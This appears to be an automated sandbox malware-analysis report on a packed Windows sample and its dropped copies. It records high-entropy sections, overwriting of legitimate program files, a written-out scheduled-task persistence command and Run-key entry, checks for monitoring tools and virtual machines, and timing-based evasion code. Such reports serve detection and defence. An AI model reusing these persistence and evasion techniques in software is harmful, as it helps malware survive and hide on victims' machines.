Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Automated click: OK
Source: Window Recorder Window detected: More than 3 window changes detected
Source: hunta[1].exe Static file information: File size 2383872 > 1048576
Source: hunta[1].exe Static PE information: Raw size of gpsaqaiu is bigger than: 0x100000 < 0x1ad600
Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.4.dr

Data Obfuscation

Source: C:\Users\user\Desktop\hunta[1].exe Unpacked PE file: 2.2.hunta[1].exe.e80000.0.unpack :EW;.rsrc:W;.idata :W; :EW;gpsaqaiu:EW;zlufpcnd:EW;.taggant:EW;u:EW; vs :ER;.rsrc:W;.idata :W; :EW;gpsaqaiu:EW;zlufpcnd:EW;.taggant:EW;u:EW;
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Unpacked PE file: 4.2.WwKLWFk.exe.210000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Unpacked PE file: 14.2.MPGPH131.exe.300000.0.unpack :EW;.rsrc:W;.idata :W; :EW;gpsaqaiu:EW;zlufpcnd:EW;.taggant:EW;u:EW; vs :ER;.rsrc:W;.idata :W; :EW;gpsaqaiu:EW;zlufpcnd:EW;.taggant:EW;u:EW;
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Unpacked PE file: 15.2.MPGPH131.exe.300000.0.unpack :EW;.rsrc:W;.idata :W; :EW;gpsaqaiu:EW;zlufpcnd:EW;.taggant:EW;u:EW; vs :ER;.rsrc:W;.idata :W; :EW;gpsaqaiu:EW;zlufpcnd:EW;.taggant:EW;u:EW;
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Unpacked PE file: 21.2.RageMP131.exe.270000.0.unpack :EW;.rsrc:W;.idata :W; :EW;gpsaqaiu:EW;zlufpcnd:EW;.taggant:EW;u:EW; vs :ER;.rsrc:W;.idata :W; :EW;gpsaqaiu:EW;zlufpcnd:EW;.taggant:EW;u:EW;
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Unpacked PE file: 22.2.WwKLWFk.exe.b50000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Unpacked PE file: 24.2.RageMP131.exe.270000.0.unpack :EW;.rsrc:W;.idata :W; :EW;gpsaqaiu:EW;zlufpcnd:EW;.taggant:EW;u:EW; vs :ER;.rsrc:W;.idata :W; :EW;gpsaqaiu:EW;zlufpcnd:EW;.taggant:EW;u:EW;
Source: initial sample Static PE information: section where entry point is pointing to: u
Source: hunta[1].exe Static PE information: section name:
Source: hunta[1].exe Static PE information: section name: .idata
Source: hunta[1].exe Static PE information: section name:
Source: hunta[1].exe Static PE information: section name: gpsaqaiu
Source: hunta[1].exe Static PE information: section name: zlufpcnd
Source: hunta[1].exe Static PE information: section name: .taggant
Source: hunta[1].exe Static PE information: section name: u
Source: RageMP131.exe.2.dr Static PE information: section name:
Source: RageMP131.exe.2.dr Static PE information: section name: .idata
Source: RageMP131.exe.2.dr Static PE information: section name:
Source: RageMP131.exe.2.dr Static PE information: section name: gpsaqaiu
Source: RageMP131.exe.2.dr Static PE information: section name: zlufpcnd
Source: RageMP131.exe.2.dr Static PE information: section name: .taggant
Source: RageMP131.exe.2.dr Static PE information: section name: u
Source: MPGPH131.exe.2.dr Static PE information: section name:
Source: MPGPH131.exe.2.dr Static PE information: section name: .idata
Source: MPGPH131.exe.2.dr Static PE information: section name:
Source: MPGPH131.exe.2.dr Static PE information: section name: gpsaqaiu
Source: MPGPH131.exe.2.dr Static PE information: section name: zlufpcnd
Source: MPGPH131.exe.2.dr Static PE information: section name: .taggant
Source: MPGPH131.exe.2.dr Static PE information: section name: u
Source: WwKLWFk.exe.2.dr Static PE information: section name: .aspack
Source: WwKLWFk.exe.2.dr Static PE information: section name: .adata
Source: MyProg.exe.4.dr Static PE information: section name: PELIB
Source: MyProg.exe.4.dr Static PE information: section name: Y|uR
Source: SciTE.exe.4.dr Static PE information: section name: u
Source: Uninstall.exe.4.dr Static PE information: section name: EpNuZ
Source: C:\Users\user\Desktop\hunta[1].exe Code function: 2_2_00F5D157 push ecx; ret 2_2_00F5D16A
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Code function: 4_2_00211638 push dword ptr [00213084h]; ret 4_2_0021170E
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Code function: 4_2_0021600A push ebp; ret 4_2_0021600D
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Code function: 4_2_00216014 push 002114E1h; ret 4_2_00216425
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Code function: 4_2_00212D9B push ecx; ret 4_2_00212DAB
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 14_2_003DD157 push ecx; ret 14_2_003DD16A
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 15_2_003DD157 push ecx; ret 15_2_003DD16A
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 21_2_0034D157 push ecx; ret 21_2_0034D16A
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Code function: 22_2_00B51638 push dword ptr [00B53084h]; ret 22_2_00B5170E
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Code function: 22_2_00B56014 push 00B514E1h; ret 22_2_00B56425
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Code function: 22_2_00B52D9B push ecx; ret 22_2_00B52DAB
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Code function: 22_2_00B5600A push ebp; ret 22_2_00B5600D
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 24_2_0034D157 push ecx; ret 24_2_0034D16A
Source: hunta[1].exe Static PE information: section name: entropy: 7.9863529700778955
Source: hunta[1].exe Static PE information: section name: gpsaqaiu entropy: 7.9114235300996505
Source: hunta[1].exe Static PE information: section name: u entropy: 6.9350665765420185
Source: RageMP131.exe.2.dr Static PE information: section name: entropy: 7.9863529700778955
Source: RageMP131.exe.2.dr Static PE information: section name: gpsaqaiu entropy: 7.9114235300996505
Source: RageMP131.exe.2.dr Static PE information: section name: u entropy: 6.9350665765420185
Source: MPGPH131.exe.2.dr Static PE information: section name: entropy: 7.9863529700778955
Source: MPGPH131.exe.2.dr Static PE information: section name: gpsaqaiu entropy: 7.9114235300996505
Source: MPGPH131.exe.2.dr Static PE information: section name: u entropy: 6.9350665765420185
Source: WwKLWFk.exe.2.dr Static PE information: section name: .text entropy: 7.81169422100848
Source: MyProg.exe.4.dr Static PE information: section name: Y|uR entropy: 6.933467573803484
Source: SciTE.exe.4.dr Static PE information: section name: u entropy: 6.934542386941867
Source: Uninstall.exe.4.dr Static PE information: section name: EpNuZ entropy: 6.934080518099734

Persistence and Installation Behavior

Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe System file written: C:\Program Files\7-Zip\Uninstall.exe
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
Source: C:\Users\user\Desktop\hunta[1].exe File created: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe File created: C:\Program Files\7-Zip\Uninstall.exe
Source: C:\Users\user\Desktop\hunta[1].exe File created: C:\ProgramData\MPGPH131\MPGPH131.exe
Source: C:\Users\user\Desktop\hunta[1].exe File created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe File created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe

Boot Survival

Source: C:\Users\user\Desktop\hunta[1].exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\hunta[1].exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\hunta[1].exe Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\hunta[1].exe Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\hunta[1].exe Window searched: window name: Filemonclass
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window searched: window name: FilemonClass
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window searched: window name: RegmonClass
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window searched: window name: Regmonclass
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Window searched: window name: Filemonclass
Source: C:\Users\user\Desktop\hunta[1].exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
Source: C:\Users\user\Desktop\hunta[1].exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131

Hooking and other Techniques for Hiding and Protection

Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49724 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49726 -> 799
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Stalling execution: Execution stalls by calling Sleep
Source: C:\Users\user\Desktop\hunta[1].exe Stalling execution: Execution stalls by calling Sleep
Source: C:\Users\user\Desktop\hunta[1].exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\hunta[1].exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 113B018 second address: 113B024 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11444A7 second address: 11444AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1144604 second address: 114460E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FF2E55A2C26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1144796 second address: 114479C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 114479C second address: 11447A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11447A0 second address: 11447B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 je 00007FF2E5514DE6h 0x0000000d jnl 00007FF2E5514DE6h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 114860C second address: 114862F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jc 00007FF2E55A2C26h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FF2E55A2C34h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 114862F second address: 1148647 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF2E5514DF4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1148647 second address: 114864B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 114864B second address: 114866F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jbe 00007FF2E5514DECh 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push edx 0x00000016 pop edx 0x00000017 popad 0x00000018 mov eax, dword ptr [eax] 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jg 00007FF2E5514DE6h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 114866F second address: 1148675 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1148675 second address: 114869D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF2E5514DF2h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11486F9 second address: 1148703 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF2E55A2C2Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1148703 second address: 114871F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push ebx 0x00000009 jmp 00007FF2E5514DEEh 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 114871F second address: 1148723 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1148723 second address: 1148740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 and dl, 0000001Bh 0x0000000b push 00000000h 0x0000000d xor dword ptr [ebp+122D1A23h], esi 0x00000013 push 4EE73472h 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1148740 second address: 1148744 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1148744 second address: 11487AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 xor dword ptr [esp], 4EE734F2h 0x0000000e mov ecx, dword ptr [ebp+122D2ADDh] 0x00000014 push 00000003h 0x00000016 jne 00007FF2E5514DECh 0x0000001c mov esi, dword ptr [ebp+122D2815h] 0x00000022 push 00000000h 0x00000024 push 00000000h 0x00000026 push eax 0x00000027 call 00007FF2E5514DE8h 0x0000002c pop eax 0x0000002d mov dword ptr [esp+04h], eax 0x00000031 add dword ptr [esp+04h], 0000001Ch 0x00000039 inc eax 0x0000003a push eax 0x0000003b ret 0x0000003c pop eax 0x0000003d ret 0x0000003e mov dword ptr [ebp+122D23CFh], ebx 0x00000044 push 00000003h 0x00000046 and ecx, 7F146AAAh 0x0000004c push 44534459h 0x00000051 push eax 0x00000052 push edx 0x00000053 push ebx 0x00000054 push ecx 0x00000055 pop ecx 0x00000056 pop ebx 0x00000057 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 114886B second address: 1148870 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1148870 second address: 1148876 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1148876 second address: 11488F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b pushad 0x0000000c and ebx, dword ptr [ebp+122D28A1h] 0x00000012 call 00007FF2E55A2C2Fh 0x00000017 sub dword ptr [ebp+122D1888h], ebx 0x0000001d pop esi 0x0000001e popad 0x0000001f push 00000000h 0x00000021 push 00000000h 0x00000023 push ecx 0x00000024 call 00007FF2E55A2C28h 0x00000029 pop ecx 0x0000002a mov dword ptr [esp+04h], ecx 0x0000002e add dword ptr [esp+04h], 00000018h 0x00000036 inc ecx 0x00000037 push ecx 0x00000038 ret 0x00000039 pop ecx 0x0000003a ret 0x0000003b jmp 00007FF2E55A2C31h 0x00000040 push C06D0BD7h 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007FF2E55A2C39h 0x0000004c rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1148A9F second address: 1148AB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF2E5514DF0h 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1148AB9 second address: 1148B21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 xor dword ptr [esp], 00E98075h 0x0000000d jmp 00007FF2E55A2C34h 0x00000012 push 00000003h 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007FF2E55A2C28h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 00000018h 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e push 00000000h 0x00000030 sub esi, dword ptr [ebp+122D18BAh] 0x00000036 push 00000003h 0x00000038 mov dword ptr [ebp+122D1A42h], ecx 0x0000003e push 92C0012Ch 0x00000043 pushad 0x00000044 ja 00007FF2E55A2C2Ch 0x0000004a je 00007FF2E55A2C26h 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1132A23 second address: 1132A6C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF2E5514E12h 0x00000008 jmp 00007FF2E5514DF7h 0x0000000d jmp 00007FF2E5514DF5h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 jmp 00007FF2E5514DEEh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11670EB second address: 116710C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FF2E55A2C30h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 116710C second address: 1167112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1167112 second address: 116711F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007FF2E55A2C26h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 116711F second address: 1167123 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1167398 second address: 116739C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 116739C second address: 11673B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF2E5514DEEh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1167501 second address: 1167507 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1167655 second address: 116767B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jmp 00007FF2E5514DECh 0x0000000b jmp 00007FF2E5514DEEh 0x00000010 pop esi 0x00000011 push edi 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1167ABD second address: 1167AC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FF2E55A2C26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1167EC1 second address: 1167EDB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DF6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1167EDB second address: 1167EE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1134565 second address: 1134571 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jg 00007FF2E5514DE6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 116832D second address: 116834B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FF2E55A2C26h 0x0000000a jp 00007FF2E55A2C26h 0x00000010 popad 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jc 00007FF2E55A2C2Eh 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 116834B second address: 1168352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1168352 second address: 1168357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1168357 second address: 1168370 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jbe 00007FF2E5514DE6h 0x00000009 js 00007FF2E5514DE6h 0x0000000f pop ebx 0x00000010 pushad 0x00000011 jnc 00007FF2E5514DE6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11688EF second address: 11688F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1168B7E second address: 1168B84 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1168CF7 second address: 1168CFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1168CFD second address: 1168D18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FF2E5514DF2h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1168D18 second address: 1168D1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 116B422 second address: 116B42A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 116E9C6 second address: 116E9D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 116EB09 second address: 116EB0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
